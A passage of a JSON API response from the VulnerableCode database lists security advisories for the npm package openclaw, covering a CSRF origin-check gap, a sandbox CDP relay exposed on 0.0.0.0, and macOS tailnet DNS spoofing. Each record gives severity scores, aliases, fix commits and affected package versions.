"VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35639", "GHSA-hf68-49fm-59cq" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eda1-pnhb-bqes" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89584?format=api", "vulnerability_id": "VCID-fekn-d6f3-xfa6", "summary": "OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n## Summary\nHTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41347", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.047", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04712", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04728", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41347" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41347", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41347" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints" }, { "reference_url": "https://github.com/advisories/GHSA-mhr7-2xmv-4c4q", "reference_id": "GHSA-mhr7-2xmv-4c4q", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mhr7-2xmv-4c4q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41347", "GHSA-mhr7-2xmv-4c4q" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fekn-d6f3-xfa6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89523?format=api", "vulnerability_id": "VCID-fuda-zxu8-gbb4", "summary": "OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0\n## Summary\n\nSandbox browser CDP relay could expose DevTools protocol on 0.0.0.0.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range.\n\n## Technical Details\n\nThe fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured.\n\n## Fix\n\nThe issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fbf11ebdb7110632f93926d0ac7b48f04cb44d77`\n- PR: #61404\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/61404", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/61404" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4" }, { "reference_url": "https://github.com/advisories/GHSA-525j-hqq2-66r4", "reference_id": "GHSA-525j-hqq2-66r4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-525j-hqq2-66r4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "GHSA-525j-hqq2-66r4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fuda-zxu8-gbb4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89900?format=api", "vulnerability_id": "VCID-g3hg-peh1-tudm", "summary": "OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration\n## Summary\nmacOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41393", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.0069", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41393" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41393", "reference_id": "CVE-2026-41393", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41393" }, { "reference_url": "https://github.com/advisories/GHSA-q9w8-cf67-r238", "reference_id": "GHSA-q9w8-cf67-r238", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q9w8-cf67-r238" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery", "reference_id": "openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": 